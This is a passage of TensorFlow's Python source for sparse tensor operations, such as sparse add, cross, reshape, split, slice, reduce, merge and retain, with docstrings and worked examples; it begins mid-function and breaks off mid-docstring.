sparse_classes = (sparse_tensor.SparseTensor, sparse_tensor.SparseTensorValue)
if not any(isinstance(inp, sparse_classes) for inp in [a, b]):
raise TypeError("At least one input should be SparseTensor; do you mean to"
" use tf.add()?")
if all(isinstance(inp, sparse_classes) for inp in [a, b]):
a = _convert_to_sparse_tensor(a)
b = _convert_to_sparse_tensor(b)
thresh = ops.convert_to_tensor(
thresh, dtype=a.values.dtype.real_dtype.base_dtype, name="thresh")
output_ind, output_val, output_shape = (
gen_sparse_ops.sparse_add(a.indices, a.values, a.dense_shape,
b.indices, b.values, b.dense_shape, thresh))
# Attempt to get output_shape statically.
a.get_shape().assert_is_compatible_with(b.get_shape())
static_shape = array_ops.broadcast_static_shape(a.get_shape(),
b.get_shape())
if static_shape.is_fully_defined():
output_shape = static_shape.as_list()
return sparse_tensor.SparseTensor(output_ind, output_val, output_shape)
else:
# swap to make `a` the SparseTensor.
if isinstance(b, sparse_classes):
a, b = b, a
return gen_sparse_ops.sparse_tensor_dense_add(a.indices, a.values,
a.dense_shape, b)
def _sparse_cross(inputs, name=None):
"""Generates sparse cross from a list of sparse and dense tensors.
For example, if the inputs are
* inputs[0]: SparseTensor with shape = [2, 2]
[0, 0]: "a"
[1, 0]: "b"
[1, 1]: "c"
* inputs[1]: SparseTensor with shape = [2, 1]
[0, 0]: "d"
[1, 0]: "e"
* inputs[2]: Tensor [["f"], ["g"]]
then the output will be:
shape = [2, 2]
[0, 0]: "a_X_d_X_f"
[1, 0]: "b_X_e_X_g"
[1, 1]: "c_X_e_X_g"
Args:
inputs: An iterable of `Tensor` or `SparseTensor`.
name: Optional name for the op.
Returns:
A `SparseTensor` of type `string`.
"""
return _sparse_cross_internal(inputs=inputs, hashed_output=False, name=name)
def _sparse_cross_hashed(inputs, num_buckets=0, hash_key=None, name=None):
"""Generates hashed sparse cross from a list of sparse and dense tensors.
For example, if the inputs are
* inputs[0]: SparseTensor with shape = [2, 2]
[0, 0]: "a"
[1, 0]: "b"
[1, 1]: "c"
* inputs[1]: SparseTensor with shape = [2, 1]
[0, 0]: "d"
[1, 0]: "e"
* inputs[2]: Tensor [["f"], ["g"]]
then the output will be:
shape = [2, 2]
[0, 0]: FingerprintCat64(
Fingerprint64("f"), FingerprintCat64(
Fingerprint64("d"), Fingerprint64("a")))
[1, 0]: FingerprintCat64(
Fingerprint64("g"), FingerprintCat64(
Fingerprint64("e"), Fingerprint64("b")))
[1, 1]: FingerprintCat64(
Fingerprint64("g"), FingerprintCat64(
Fingerprint64("e"), Fingerprint64("c")))
Args:
inputs: An iterable of `Tensor` or `SparseTensor`.
num_buckets: An `int` that is `>= 0`.
output = hashed_value%num_buckets if num_buckets > 0 else hashed_value.
hash_key: Integer hash_key that will be used by the `FingerprintCat64`
function. If not given, will use a default key.
name: Optional name for the op.
Returns:
A `SparseTensor` of type `int64`.
"""
return _sparse_cross_internal(
inputs=inputs,
hashed_output=True,
num_buckets=num_buckets,
hash_key=hash_key,
name=name)
_DEFAULT_HASH_KEY = 0xDECAFCAFFE
def _sparse_cross_internal(inputs,
hashed_output=False,
num_buckets=0,
hash_key=None,
name=None):
"""See gen_sparse_ops.sparse_cross."""
if not isinstance(inputs, list):
raise TypeError("Inputs must be a list")
if not all(
isinstance(i, sparse_tensor.SparseTensor) or isinstance(i, ops.Tensor)
for i in inputs):
raise TypeError("All inputs must be SparseTensors")
sparse_inputs = [
i for i in inputs if isinstance(i, sparse_tensor.SparseTensor)
]
dense_inputs = [
i for i in inputs if not isinstance(i, sparse_tensor.SparseTensor)
]
indices = [sp_input.indices for sp_input in sparse_inputs]
values = [sp_input.values for sp_input in sparse_inputs]
shapes = [sp_input.dense_shape for sp_input in sparse_inputs]
out_type = dtypes.int64 if hashed_output else dtypes.string
internal_type = dtypes.string
for i in range(len(values)):
if values[i].dtype != dtypes.string:
values[i] = math_ops.to_int64(values[i])
internal_type = dtypes.int64
for i in range(len(dense_inputs)):
if dense_inputs[i].dtype != dtypes.string:
dense_inputs[i] = math_ops.to_int64(dense_inputs[i])
internal_type = dtypes.int64
indices_out, values_out, shape_out = gen_sparse_ops.sparse_cross(
indices=indices,
values=values,
shapes=shapes,
dense_inputs=dense_inputs,
hashed_output=hashed_output,
num_buckets=num_buckets,
hash_key=hash_key or _DEFAULT_HASH_KEY,
out_type=out_type,
internal_type=internal_type,
name=name)
return sparse_tensor.SparseTensor(indices_out, values_out, shape_out)
def sparse_dense_cwise_add(sp_t, dense_t):
"""Adds up a SparseTensor and a dense Tensor, using these special rules:
(1) Broadcasts the dense side to have the same shape as the sparse side, if
eligible;
(2) Then, only the dense values pointed to by the indices of the SparseTensor
participate in the cwise addition.
By the rules, the result is a logical SparseTensor with exactly the same
indices and shape, but possibly with different non-zero values. The output of
this Op is the resultant non-zero values.
Args:
sp_t: the SparseTensor operand.
dense_t: the dense Tensor operand; must have the same dtype and a
broadcast-compatible shape as `sp_t`.
Returns:
output: the SparseTensor output.
"""
result = gen_sparse_ops.sparse_dense_cwise_add(sp_t.indices, sp_t.values,
sp_t.dense_shape, dense_t)
return sparse_tensor.SparseTensor(sp_t.indices, result, sp_t.dense_shape)
@tf_export("sparse_reorder")
def sparse_reorder(sp_input, name=None):
"""Reorders a `SparseTensor` into the canonical, row-major ordering.
Note that by convention, all sparse ops preserve the canonical ordering
along increasing dimension number. The only time ordering can be violated
is during manual manipulation of the indices and values to add entries.
Reordering does not affect the shape of the `SparseTensor`.
For example, if `sp_input` has shape `[4, 5]` and `indices` / `values`:
[0, 3]: b
[0, 1]: a
[3, 1]: d
[2, 0]: c
then the output will be a `SparseTensor` of shape `[4, 5]` and
`indices` / `values`:
[0, 1]: a
[0, 3]: b
[2, 0]: c
[3, 1]: d
Args:
sp_input: The input `SparseTensor`.
name: A name prefix for the returned tensors (optional)
Returns:
A `SparseTensor` with the same shape and non-empty values, but in
canonical ordering.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
reordered_ind, reordered_val = (
gen_sparse_ops.sparse_reorder(
sp_input.indices, sp_input.values, sp_input.dense_shape, name=name))
if sp_input.get_shape().is_fully_defined():
dense_shape = sp_input.get_shape().as_list()
else:
dense_shape = array_ops.identity(sp_input.dense_shape)
return sparse_tensor.SparseTensor(reordered_ind, reordered_val, dense_shape)
@tf_export("sparse_reshape")
def sparse_reshape(sp_input, shape, name=None):
"""Reshapes a `SparseTensor` to represent values in a new dense shape.
This operation has the same semantics as `reshape` on the represented dense
tensor. The indices of non-empty values in `sp_input` are recomputed based
on the new dense shape, and a new `SparseTensor` is returned containing the
new indices and new shape. The order of non-empty values in `sp_input` is
unchanged.
If one component of `shape` is the special value -1, the size of that
dimension is computed so that the total dense size remains constant. At
most one component of `shape` can be -1. The number of dense elements
implied by `shape` must be the same as the number of dense elements
originally represented by `sp_input`.
For example, if `sp_input` has shape `[2, 3, 6]` and `indices` / `values`:
[0, 0, 0]: a
[0, 0, 1]: b
[0, 1, 0]: c
[1, 0, 0]: d
[1, 2, 3]: e
and `shape` is `[9, -1]`, then the output will be a `SparseTensor` of
shape `[9, 4]` and `indices` / `values`:
[0, 0]: a
[0, 1]: b
[1, 2]: c
[4, 2]: d
[8, 1]: e
Args:
sp_input: The input `SparseTensor`.
shape: A 1-D (vector) int64 `Tensor` specifying the new dense shape of the
represented `SparseTensor`.
name: A name prefix for the returned tensors (optional)
Returns:
A `SparseTensor` with the same non-empty values but with indices calculated
by the new dense shape.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
ValueError: If argument `shape` requests a `SparseTensor` with a different
number of elements than `sp_input`.
ValueError: If `shape` has more than one inferred (== -1) dimension.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
shape = math_ops.cast(shape, dtype=dtypes.int64)
with ops.name_scope(name, "SparseReshape", [sp_input]) as name:
reshaped_ind, reshaped_shape = gen_sparse_ops.sparse_reshape(
sp_input.indices, sp_input.dense_shape, shape, name=name)
reshaped_shape_const = tensor_util.constant_value(shape)
if (reshaped_shape_const is not None and
sp_input.get_shape().is_fully_defined()):
num_implied = sum((dim == -1) for dim in reshaped_shape_const)
if num_implied > 1:
raise ValueError("At most one dimension can be inferred (-1). Found: %s"
% reshaped_shape_const)
original_reshaped_shape = list(reshaped_shape_const) # Copy.
in_shape_size = np.prod(sp_input.get_shape().as_list())
if num_implied:
implied_idx = original_reshaped_shape.index(-1)
non_implied_idx = (
original_reshaped_shape[:implied_idx] +
original_reshaped_shape[implied_idx + 1:])
reshaped_shape_const[implied_idx] = (
in_shape_size // np.prod(non_implied_idx))
reshaped_size = np.prod(reshaped_shape_const)
if reshaped_size != in_shape_size:
raise ValueError("Cannot reshape a tensor with %d elements to shape %s "
"(%d elements)." %
(in_shape_size, original_reshaped_shape,
reshaped_size))
reshaped_shape = reshaped_shape_const
return sparse_tensor.SparseTensor(reshaped_ind,
array_ops.identity(sp_input.values),
reshaped_shape)
# TODO(aselle): Remove keyword required once for 1.0 final
class KeywordRequired(object):
def __repr__(self):
# This is needed to make documentation without fully qualified module paths
return "KeywordRequired()"
@tf_export("sparse_split")
def sparse_split(keyword_required=KeywordRequired(),
sp_input=None,
num_split=None,
axis=None,
name=None,
split_dim=None):
"""Split a `SparseTensor` into `num_split` tensors along `axis`.
If the `sp_input.dense_shape[axis]` is not an integer multiple of `num_split`
each slice starting from 0:`shape[axis] % num_split` gets extra one
dimension. For example, if `axis = 1` and `num_split = 2` and the
input is:
input_tensor = shape = [2, 7]
[ a d e ]
[b c ]
Graphically the output tensors are:
output_tensor[0] =
[ a ]
[b c ]
output_tensor[1] =
[ d e ]
[ ]
Args:
keyword_required: Python 2 standin for * (temporary for argument reorder)
sp_input: The `SparseTensor` to split.
num_split: A Python integer. The number of ways to split.
axis: A 0-D `int32` `Tensor`. The dimension along which to split.
name: A name for the operation (optional).
split_dim: Deprecated old name for axis.
Returns:
`num_split` `SparseTensor` objects resulting from splitting `value`.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
ValueError: If the deprecated `split_dim` and `axis` are both non None.
"""
if not isinstance(keyword_required, KeywordRequired):
raise ValueError("Keyword arguments are required for this function.")
if sp_input is None:
raise ValueError("sp_input is required")
if num_split is None:
raise ValueError("num_split is required")
if axis is None:
raise ValueError("axis is required")
axis = deprecation.deprecated_argument_lookup("axis", axis, "split_dim",
split_dim)
sp_input = _convert_to_sparse_tensor(sp_input)
output_inds, output_vals, output_shapes = (
gen_sparse_ops.sparse_split(
axis,
sp_input.indices,
sp_input.values,
sp_input.dense_shape,
num_split,
name=name))
sparse_tensors = []
for i in range(0, num_split):
sparse_tensors.append(
sparse_tensor.SparseTensor(output_inds[i], output_vals[i],
output_shapes[i]))
return sparse_tensors
@tf_export("sparse_slice")
def sparse_slice(sp_input, start, size, name=None):
"""Slice a `SparseTensor` based on the `start` and `size.
For example, if the input is
input_tensor = shape = [2, 7]
[ a d e ]
[b c ]
Graphically the output tensors are:
sparse_slice([0, 0], [2, 4]) = shape = [2, 4]
[ a ]
[b c ]
sparse_slice([0, 4], [2, 3]) = shape = [2, 3]
[ d e ]
[ ]
Args:
sp_input: The `SparseTensor` to split.
start: 1-D. tensor represents the start of the slice.
size: 1-D. tensor represents the size of the slice.
name: A name for the operation (optional).
Returns:
A `SparseTensor` objects resulting from splicing.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
start = ops.convert_to_tensor(start, dtypes.int64)
size = ops.convert_to_tensor(size, dtypes.int64)
with ops.name_scope(name, "SparseSlice", [sp_input]) as name:
output_indices, output_values, output_shape = gen_sparse_ops.sparse_slice(
sp_input.indices,
sp_input.values,
sp_input.dense_shape,
start,
size,
name=name)
return sparse_tensor.SparseTensor(output_indices, output_values,
output_shape)
@tf_export("sparse_to_dense")
def sparse_to_dense(sparse_indices,
output_shape,
sparse_values,
default_value=0,
validate_indices=True,
name=None):
"""Converts a sparse representation into a dense tensor.
Builds an array `dense` with shape `output_shape` such that
```python
# If sparse_indices is scalar
dense[i] = (i == sparse_indices ? sparse_values : default_value)
# If sparse_indices is a vector, then for each i
dense[sparse_indices[i]] = sparse_values[i]
# If sparse_indices is an n by d matrix, then for each i in [0, n)
dense[sparse_indices[i][0], ..., sparse_indices[i][d-1]] = sparse_values[i]
```
All other values in `dense` are set to `default_value`. If `sparse_values`
is a scalar, all sparse indices are set to this single value.
Indices should be sorted in lexicographic order, and indices must not
contain any repeats. If `validate_indices` is True, these properties
are checked during execution.
Args:
sparse_indices: A 0-D, 1-D, or 2-D `Tensor` of type `int32` or `int64`.
`sparse_indices[i]` contains the complete index where `sparse_values[i]`
will be placed.
output_shape: A 1-D `Tensor` of the same type as `sparse_indices`. Shape
of the dense output tensor.
sparse_values: A 0-D or 1-D `Tensor`. Values corresponding to each row of
`sparse_indices`, or a scalar value to be used for all sparse indices.
default_value: A 0-D `Tensor` of the same type as `sparse_values`. Value
to set for indices not specified in `sparse_indices`. Defaults to zero.
validate_indices: A boolean value. If True, indices are checked to make
sure they are sorted in lexicographic order and that there are no repeats.
name: A name for the operation (optional).
Returns:
Dense `Tensor` of shape `output_shape`. Has the same type as
`sparse_values`.
"""
return gen_sparse_ops.sparse_to_dense(
sparse_indices,
output_shape,
sparse_values,
default_value=default_value,
validate_indices=validate_indices,
name=name)
@tf_export("sparse_reduce_max")
def sparse_reduce_max(sp_input, axis=None, keep_dims=False,
reduction_axes=None):
"""Computes the max of elements across dimensions of a SparseTensor.
This Op takes a SparseTensor and is the sparse counterpart to
`tf.reduce_max()`. In particular, this Op also returns a dense `Tensor`
instead of a sparse one.
Reduces `sp_input` along the dimensions given in `reduction_axes`. Unless
`keep_dims` is true, the rank of the tensor is reduced by 1 for each entry in
`reduction_axes`. If `keep_dims` is true, the reduced dimensions are retained
with length 1.
If `reduction_axes` has no entries, all dimensions are reduced, and a tensor
with a single element is returned. Additionally, the axes can be negative,
similar to the indexing rules in Python.
For example:
```python
# 'x' represents [[1, ?, 2]
# [?, 3, ?]]
# where ? is implicitly-zero.
tf.sparse_reduce_max(x) ==> 3
tf.sparse_reduce_max(x, 0) ==> [1, 3, 2]
tf.sparse_reduce_max(x, 1) ==> [2, 3] # Can also use -1 as the axis.
tf.sparse_reduce_max(x, 1, keep_dims=True) ==> [[2], [3]]
tf.sparse_reduce_max(x, [0, 1]) ==> 3
```
Args:
sp_input: The SparseTensor to reduce. Should have numeric type.
axis: The dimensions to reduce; list or scalar. If `None` (the
default), reduces all dimensions.
keep_dims: If true, retain reduced dimensions with length 1.
reduction_axes: Deprecated name of axis.
Returns:
The reduced Tensor.
"""
return gen_sparse_ops.sparse_reduce_max(
sp_input.indices, sp_input.values, sp_input.dense_shape,
math_ops._ReductionDims(sp_input, axis, reduction_axes), keep_dims)
@tf_export("sparse_reduce_max_sparse")
def sparse_reduce_max_sparse(sp_input,
axis=None,
keep_dims=False,
reduction_axes=None):
"""Computes the max of elements across dimensions of a SparseTensor.
This Op takes a SparseTensor and is the sparse counterpart to
`tf.reduce_max()`. In contrast to SparseReduceSum, this Op returns a
SparseTensor.
Reduces `sp_input` along the dimensions given in `reduction_axes`. Unless
`keep_dims` is true, the rank of the tensor is reduced by 1 for each entry in
`reduction_axes`. If `keep_dims` is true, the reduced dimensions are retained
with length 1.
If `reduction_axes` has no entries, all dimensions are reduced, and a tensor
with a single element is returned. Additionally, the axes can be negative,
which are interpreted according to the indexing rules in Python.
Args:
sp_input: The SparseTensor to reduce. Should have numeric type.
axis: The dimensions to reduce; list or scalar. If `None` (the
default), reduces all dimensions.
keep_dims: If true, retain reduced dimensions with length 1.
reduction_axes: Deprecated name of axis
Returns:
The reduced SparseTensor.
"""
output_ind, output_val, output_shape = (
gen_sparse_ops.sparse_reduce_max_sparse(
sp_input.indices, sp_input.values, sp_input.dense_shape,
math_ops._ReductionDims(sp_input, axis, reduction_axes), keep_dims))
return sparse_tensor.SparseTensor(output_ind, output_val, output_shape)
@tf_export("sparse_reduce_sum")
def sparse_reduce_sum(sp_input, axis=None, keep_dims=False,
reduction_axes=None):
"""Computes the sum of elements across dimensions of a SparseTensor.
This Op takes a SparseTensor and is the sparse counterpart to
`tf.reduce_sum()`. In particular, this Op also returns a dense `Tensor`
instead of a sparse one.
Reduces `sp_input` along the dimensions given in `reduction_axes`. Unless
`keep_dims` is true, the rank of the tensor is reduced by 1 for each entry in
`reduction_axes`. If `keep_dims` is true, the reduced dimensions are retained
with length 1.
If `reduction_axes` has no entries, all dimensions are reduced, and a tensor
with a single element is returned. Additionally, the axes can be negative,
similar to the indexing rules in Python.
For example:
```python
# 'x' represents [[1, ?, 1]
# [?, 1, ?]]
# where ? is implicitly-zero.
tf.sparse_reduce_sum(x) ==> 3
tf.sparse_reduce_sum(x, 0) ==> [1, 1, 1]
tf.sparse_reduce_sum(x, 1) ==> [2, 1] # Can also use -1 as the axis.
tf.sparse_reduce_sum(x, 1, keep_dims=True) ==> [[2], [1]]
tf.sparse_reduce_sum(x, [0, 1]) ==> 3
```
Args:
sp_input: The SparseTensor to reduce. Should have numeric type.
axis: The dimensions to reduce; list or scalar. If `None` (the
default), reduces all dimensions.
keep_dims: If true, retain reduced dimensions with length 1.
reduction_axes: Deprecated name of axis.
Returns:
The reduced Tensor.
"""
return gen_sparse_ops.sparse_reduce_sum(
sp_input.indices, sp_input.values, sp_input.dense_shape,
math_ops._ReductionDims(sp_input, axis, reduction_axes), keep_dims)
@tf_export("sparse_reduce_sum_sparse")
def sparse_reduce_sum_sparse(sp_input,
axis=None,
keep_dims=False,
reduction_axes=None):
"""Computes the sum of elements across dimensions of a SparseTensor.
This Op takes a SparseTensor and is the sparse counterpart to
`tf.reduce_sum()`. In contrast to SparseReduceSum, this Op returns a
SparseTensor.
Reduces `sp_input` along the dimensions given in `reduction_axes`. Unless
`keep_dims` is true, the rank of the tensor is reduced by 1 for each entry in
`reduction_axes`. If `keep_dims` is true, the reduced dimensions are retained
with length 1.
If `reduction_axes` has no entries, all dimensions are reduced, and a tensor
with a single element is returned. Additionally, the axes can be negative,
which are interpreted according to the indexing rules in Python.
Args:
sp_input: The SparseTensor to reduce. Should have numeric type.
axis: The dimensions to reduce; list or scalar. If `None` (the
default), reduces all dimensions.
keep_dims: If true, retain reduced dimensions with length 1.
reduction_axes: Deprecated name of axis
Returns:
The reduced SparseTensor.
"""
output_ind, output_val, output_shape = (
gen_sparse_ops.sparse_reduce_sum_sparse(
sp_input.indices, sp_input.values, sp_input.dense_shape,
math_ops._ReductionDims(sp_input, axis, reduction_axes), keep_dims))
return sparse_tensor.SparseTensor(output_ind, output_val, output_shape)
@tf_export("sparse_tensor_to_dense")
def sparse_tensor_to_dense(sp_input,
default_value=0,
validate_indices=True,
name=None):
"""Converts a `SparseTensor` into a dense tensor.
This op is a convenience wrapper around `sparse_to_dense` for `SparseTensor`s.
For example, if `sp_input` has shape `[3, 5]` and non-empty string values:
[0, 1]: a
[0, 3]: b
[2, 0]: c
and `default_value` is `x`, then the output will be a dense `[3, 5]`
string tensor with values:
[[x a x b x]
[x x x x x]
[c x x x x]]
Indices must be without repeats. This is only
tested if validate_indices is True.
Args:
sp_input: The input `SparseTensor`.
default_value: Scalar value to set for indices not specified in
`sp_input`. Defaults to zero.
validate_indices: A boolean value. If `True`, indices are checked to make
sure they are sorted in lexicographic order and that there are no repeats.
name: A name prefix for the returned tensors (optional).
Returns:
A dense tensor with shape `sp_input.dense_shape` and values specified by
the non-empty values in `sp_input`. Indices not in `sp_input` are assigned
`default_value`.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
return sparse_to_dense(
sp_input.indices,
sp_input.dense_shape,
sp_input.values,
default_value=default_value,
validate_indices=validate_indices,
name=name)
@tf_export("sparse_to_indicator")
def sparse_to_indicator(sp_input, vocab_size, name=None):
"""Converts a `SparseTensor` of ids into a dense bool indicator tensor.
The last dimension of `sp_input.indices` is discarded and replaced with
the values of `sp_input`. If `sp_input.dense_shape = [D0, D1, ..., Dn, K]`,
then `output.shape = [D0, D1, ..., Dn, vocab_size]`, where
output[d_0, d_1, ..., d_n, sp_input[d_0, d_1, ..., d_n, k]] = True
and False elsewhere in `output`.
For example, if `sp_input.dense_shape = [2, 3, 4]` with non-empty values:
[0, 0, 0]: 0
[0, 1, 0]: 10
[1, 0, 3]: 103
[1, 1, 2]: 150
[1, 1, 3]: 149
[1, 1, 4]: 150
[1, 2, 1]: 121
and `vocab_size = 200`, then the output will be a `[2, 3, 200]` dense bool
tensor with False everywhere except at positions
(0, 0, 0), (0, 1, 10), (1, 0, 103), (1, 1, 149), (1, 1, 150),
(1, 2, 121).
Note that repeats are allowed in the input SparseTensor.
This op is useful for converting `SparseTensor`s into dense formats for
compatibility with ops that expect dense tensors.
The input `SparseTensor` must be in row-major order.
Args:
sp_input: A `SparseTensor` with `values` property of type `int32` or
`int64`.
vocab_size: A scalar int64 Tensor (or Python int) containing the new size
of the last dimension, `all(0 <= sp_input.values < vocab_size)`.
name: A name prefix for the returned tensors (optional)
Returns:
A dense bool indicator tensor representing the indices with specified value.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
with ops.name_scope(name, "SparseToIndicator", [sp_input]) as name:
num_entries = array_ops.shape(sp_input.indices)[0]
new_values = array_ops.fill(array_ops.expand_dims(num_entries, 0), True)
sp_values = sparse_tensor.SparseTensor(sp_input.indices, new_values,
sp_input.dense_shape)
sp_new = sparse_merge(sp_input, sp_values, vocab_size, name)
# validate_indices may be False because we allow duplicates in new_indices:
# repeated indices are allowed when creating an indicator matrix.
return sparse_tensor_to_dense(
sp_new, default_value=False, validate_indices=False, name=name)
@tf_export("sparse_merge")
def sparse_merge(sp_ids, sp_values, vocab_size, name=None,
already_sorted=False):
"""Combines a batch of feature ids and values into a single `SparseTensor`.
The most common use case for this function occurs when feature ids and
their corresponding values are stored in `Example` protos on disk.
`parse_example` will return a batch of ids and a batch of values, and this
function joins them into a single logical `SparseTensor` for use in
functions such as `sparse_tensor_dense_matmul`, `sparse_to_dense`, etc.
The `SparseTensor` returned by this function has the following properties:
- `indices` is equivalent to `sp_ids.indices` with the last
dimension discarded and replaced with `sp_ids.values`.
- `values` is simply `sp_values.values`.
- If `sp_ids.dense_shape = [D0, D1, ..., Dn, K]`, then
`output.shape = [D0, D1, ..., Dn, vocab_size]`.
For example, consider the following feature vectors:
```python
vector1 = [-3, 0, 0, 0, 0, 0]
vector2 = [ 0, 1, 0, 4, 1, 0]
vector3 = [ 5, 0, 0, 9, 0, 0]
```
These might be stored sparsely in the following Example protos by storing
only the feature ids (column number if the vectors are treated as a matrix)
of the non-zero elements and the corresponding values:
```python
examples = [Example(features={
"ids": Feature(int64_list=Int64List(value=[0])),
"values": Feature(float_list=FloatList(value=[-3]))}),
Example(features={
"ids": Feature(int64_list=Int64List(value=[1, 4, 3])),
"values": Feature(float_list=FloatList(value=[1, 1, 4]))}),
Example(features={
"ids": Feature(int64_list=Int64List(value=[0, 3])),
"values": Feature(float_list=FloatList(value=[5, 9]))})]
```
The result of calling parse_example on these examples will produce a
dictionary with entries for "ids" and "values". Passing those two objects
to this function along with vocab_size=6, will produce a `SparseTensor` that
sparsely represents all three instances. Namely, the `indices` property will
contain the coordinates of the non-zero entries in the feature matrix (the
first dimension is the row number in the matrix, i.e., the index within the
batch, and the second dimension is the column number, i.e., the feature id);
`values` will contain the actual values. `shape` will be the shape of the
original matrix, i.e., (3, 6). For our example above, the output will be
equal to:
```python
SparseTensor(indices=[[0, 0], [1, 1], [1, 3], [1, 4], [2, 0], [2, 3]],
values=[-3, 1, 4, 1, 5, 9],
dense_shape=[3, 6])
```
This method generalizes to higher-dimensions by simply providing a list for
both the sp_ids as well as the vocab_size.
In this case the resulting `SparseTensor` has the following properties:
- `indices` is equivalent to `sp_ids[0].indices` with the last
dimension discarded and concatenated with
`sp_ids[0].values, sp_ids[1].values, ...`.
- `values` is simply `sp_values.values`.
- If `sp_ids.dense_shape = [D0, D1, ..., Dn, K]`, then
`output.shape = [D0, D1, ..., Dn] + vocab_size`.
Args:
sp_ids: A single `SparseTensor` with `values` property of type `int32`
or `int64` or a Python list of such `SparseTensor`s or a list thereof.
sp_values: A `SparseTensor` of any type.
vocab_size: A scalar `int64` Tensor (or Python int) containing the new size
of the last dimension, `all(0 <= sp_ids.values < vocab_size)`.
Or a list thereof with `all(0 <= sp_ids[i].values < vocab_size[i])` for
all `i`.
name: A name prefix for the returned tensors (optional)
already_sorted: A boolean to specify whether the per-batch values in
`sp_values` are already sorted. If so skip sorting, False by default
(optional).
Returns:
A `SparseTensor` compactly representing a batch of feature ids and values,
useful for passing to functions that expect such a `SparseTensor`.
Raises:
TypeError: If `sp_values` is not a `SparseTensor`. Or if `sp_ids` is neither
a `SparseTensor` nor a list thereof. Or if `vocab_size` is not a
`Tensor` or a Python int and `sp_ids` is a `SparseTensor`. Or if
`vocab_size` is not a or list thereof and `sp_ids` is a list.
ValueError: If `sp_ids` and `vocab_size` are lists of different lengths.
"""
if isinstance(sp_ids, sparse_tensor.SparseTensorValue) or isinstance(
sp_ids, sparse_tensor.SparseTensor):
sp_ids = [sp_ids]
if not (isinstance(vocab_size, ops.Tensor) or
isinstance(vocab_size, numbers.Integral)):
raise TypeError("vocab_size has to be a Tensor or Python int. Found %s" %
type(vocab_size))
vocab_size = [vocab_size]
else:
if not isinstance(sp_ids, collections.Iterable):
raise TypeError("sp_ids has to be a SparseTensor or list thereof. "
"Found %s" % type(sp_ids))
if not isinstance(vocab_size, collections.Iterable):
raise TypeError("vocab_size has to be a list of Tensors or Python ints. "
"Found %s" % type(vocab_size))
for dim in vocab_size:
if not (isinstance(dim, ops.Tensor) or isinstance(dim, numbers.Integral)):
raise TypeError(
"vocab_size has to be a list of Tensors or Python ints. Found %s" %
type(dim))
if len(sp_ids) != len(vocab_size):
raise ValueError("sp_ids and vocab_size have to have equal lengths.")
with ops.name_scope(name, "SparseMerge", [sp_ids, sp_values]):
sp_ids = [_convert_to_sparse_tensor(sp_ids_dim) for sp_ids_dim in sp_ids]
sp_values = _convert_to_sparse_tensor(sp_values)
ids = []
for sp_ids_dim in sp_ids:
ids_dim = sp_ids_dim.values
if sp_ids_dim.dtype != dtypes.int64:
ids_dim = math_ops.cast(ids_dim, dtypes.int64)
ids += [array_ops.expand_dims(ids_dim, axis=1)]
vocab_size = [math_ops.cast(x, dtypes.int64) for x in vocab_size]
# Slice off the last dimension of indices, then tack on the ids
indices_columns_to_preserve = sp_ids[0].indices[:, :-1]
new_indices = array_ops.concat([indices_columns_to_preserve] + ids, 1)
new_values = sp_values.values
new_shape = array_ops.concat([sp_ids[0].dense_shape[:-1], vocab_size], 0)
result = sparse_tensor.SparseTensor(new_indices, new_values, new_shape)
return result if already_sorted else sparse_reorder(result)
@tf_export("sparse_retain")
def sparse_retain(sp_input, to_retain):
"""Retains specified non-empty values within a `SparseTensor`.
For example, if `sp_input` has shape `[4, 5]` and 4 non-empty string values:
[0, 1]: a
[0, 3]: b
[2, 0]: c
[3, 1]: d
and `to_retain = [True, False, False, True]`, then the output will
be a `SparseTensor` of shape `[4, 5]` with 2 non-empty values:
[0, 1]: a
[3, 1]: d
Args:
sp_input: The input `SparseTensor` with `N` non-empty elements.
to_retain: A bool vector of length `N` with `M` true values.
Returns:
A `SparseTensor` with the same shape as the input and `M` non-empty
elements corresponding to the true positions in `to_retain`.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
to_retain = ops.convert_to_tensor(to_retain)
# Shape checking, if shape is known at graph construction time
retain_shape = to_retain.get_shape()
retain_shape.assert_has_rank(1)
sp_input.values.get_shape()[0].merge_with(retain_shape[0])
where_true = array_ops.reshape(array_ops.where(to_retain), [-1])
new_indices = array_ops.gather(sp_input.indices, where_true)
new_values = array_ops.gather(sp_input.values, where_true)
return sparse_tensor.SparseTensor(new_indices, new_values,
array_ops.identity(sp_input.dense_shape))
@tf_export("sparse_reset_shape")
def sparse_reset_shape(sp_input, new_shape=None):
"""Resets the shape of a `SparseTensor` with indices and values unchanged.
If `new_shape` is None, returns a copy of `sp_input` with its shape reset
to the tight bounding box of `sp_input`. This will be a shape consisting of
all zeros if sp_input has no values.
If `new_shape` is provided, then it must be larger or equal in all dimensions
compared to the shape of `sp_input`. When this condition is met, the returned
SparseTensor will have its shape reset to `new_shape` and its indices and
values unchanged from that of `sp_input.`
For example:
Consider a `sp_input` with shape [2, 3, 5]:
[0, 0, 1]: a
[0, 1, 0]: b
[0, 2, 2]: c
[1, 0, 3]: d
- It is an error to set `new_shape` as [3, 7] since this represents a
rank-2 tensor while `sp_input` is rank-3. This is either a ValueError
during graph construction (if both shapes are known) or an OpError during
run time.
- Setting `new_shape` as [2, 3, 6] will be fine as this shape is larger or
equal in every dimension compared to the original shape [2, 3, 5].
- On the other hand, setting new_shape as [2, 3, 4] is also an error: The
third dimension is smaller than the original shape [2, 3, 5] (and an
`InvalidArgumentError` will be raised).
- If `new_shape` is None, the returned SparseTensor will have a shape
[2, 3, 4], which is the tight bounding box of `sp_input`.
Args:
sp_input: The input `SparseTensor`.
new_shape: None or a vector representing the new shape for the returned
`SparseTensor`.
Returns:
A `SparseTensor` indices and values unchanged from `input_sp`. Its shape is
`new_shape` if that is set. Otherwise it is the tight bounding box of
`input_sp`
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
ValueError: If `new_shape` represents a tensor with a different rank from
that of `sp_input` (if shapes are known when graph is constructed).
ValueError: If `new_shape` is determined during graph build to have
dimension sizes that are too small.
OpError:
